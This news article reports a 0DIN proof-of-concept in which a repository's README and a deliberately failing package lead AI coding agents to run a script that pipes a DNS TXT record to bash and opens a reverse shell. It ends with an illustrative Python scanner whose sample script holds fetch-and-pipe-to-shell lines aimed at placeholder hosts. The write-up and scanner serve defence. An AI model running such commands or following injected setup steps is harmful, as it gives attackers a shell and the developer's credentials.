A malicious GitHub repository can silently compromise a developer’s machine without containing a single line of malicious code, security researchers at Mozilla’s Zero Day Investigative Network (0DIN) warned.
The attack
The proof-of-concept attack targets AI-powered coding agents such as Claude Code, and uses indirect prompt injection to manipulate an AI agent into taking harmful actions the developer never explicitly approved.
The attack chain is as follows:
- The malicious repository presents normal-looking setup instructions in the README file
- A Python package is engineered to fail on first use and direct the user to run an initialization command
- That command calls a shell script, which resolves a DNS TXT record controlled by the attacker, and pipes its contents directly to bash.
The executed malicious payload – a reverse shell in this case – is not in the repository. It is fetched and executed only at runtime. Thus, the payload is “invisible” to code review, static analysis tools, and the AI agent reading the repository.
The agent simply follows the setup steps, recovers from an expected error as instructed, and unknowingly opens a connection back to the attacker’s server. From that point, the attacker has an interactive shell running with the developer’s own privileges.
“Agentic coding tools have access to everything they need for this [attack]: non-public information, including environment variables, credentials, API keys, and local configuration files,” the researchers noted.
Advice for developers
0DIN recommends that AI coding agents be designed to surface what a command will actually execute at runtime, rather than evaluating only the literal command string.
“Developers should treat setup instructions and scripts in unfamiliar repositories as untrusted code, regardless of what their AI tool recommends,” they added.
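One way to review a setup script before running it is to look for lines that hand network-fetched text to a shell, including the case where the lookup result is first stored in a variable. The following is an added example, not code from 0DIN or from any coding agent; the function name `scan_script`, the sample script and the `example.invalid` hostnames are constructed for illustration, and the check is a line-based heuristic rather than a full shell parser.

```python
import re

# Commands whose output comes from the network (DNS lookups, HTTP clients).
FETCH = re.compile(r"\b(?:dig|nslookup|curl|wget)\b")
SHELL = r"(?:ba|z|da|k)?sh"
ASSIGN = re.compile(r"^\s*(?:export\s+)?([A-Za-z_]\w*)=(.*)$")
# Sinks that execute text: "... | bash", eval, "bash -c", "source <(...)".
PIPE_SINK = re.compile(rf"\|\s*(?:sudo\s+)?{SHELL}\b")
ARG_SINK = re.compile(
    rf"(?:\beval\b|\b{SHELL}\s+-c\b|(?:\bsource|\b{SHELL})\s+<\()(.*)$")

# Constructed sample of an init script (not taken from the PoC repository).
SAMPLE = """#!/bin/bash
pip install -r requirements.txt
cfg=$(dig +short TXT setup.example.invalid)
echo "$cfg" | tr -d '"' | bash
curl -fsSL https://example.invalid/install.sh | sh
echo "done" | tee setup.log
"""


def scan_script(text):
    """Return (line_no, reason) for lines that execute network-fetched text."""
    findings, tainted = [], set()

    def fetched(s):
        # True if s runs a fetch command or expands a variable holding one.
        return bool(FETCH.search(s)) or any(
            re.search(rf"\$\{{?{v}\b", s) for v in tainted)

    for n, line in enumerate(text.splitlines(), 1):
        code = re.sub(r"(^|\s)#.*$", "", line)  # drop comments and shebang
        m = ASSIGN.match(code)
        if m and fetched(m.group(2)):
            tainted.add(m.group(1))  # remember the variable for later lines
        m = PIPE_SINK.search(code)
        if m and fetched(code[:m.start()]):
            findings.append((n, "fetched content piped into a shell"))
            continue
        m = ARG_SINK.search(code)
        if m and fetched(m.group(1)):
            findings.append((n, "fetched content passed to eval or a shell"))
    return findings


if __name__ == "__main__":
    for n, reason in scan_script(SAMPLE):
        print(f"line {n}: {reason}")
```

A finding means the literal command string does not show what will run; the fetched content has to be retrieved and read separately before anything is executed.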











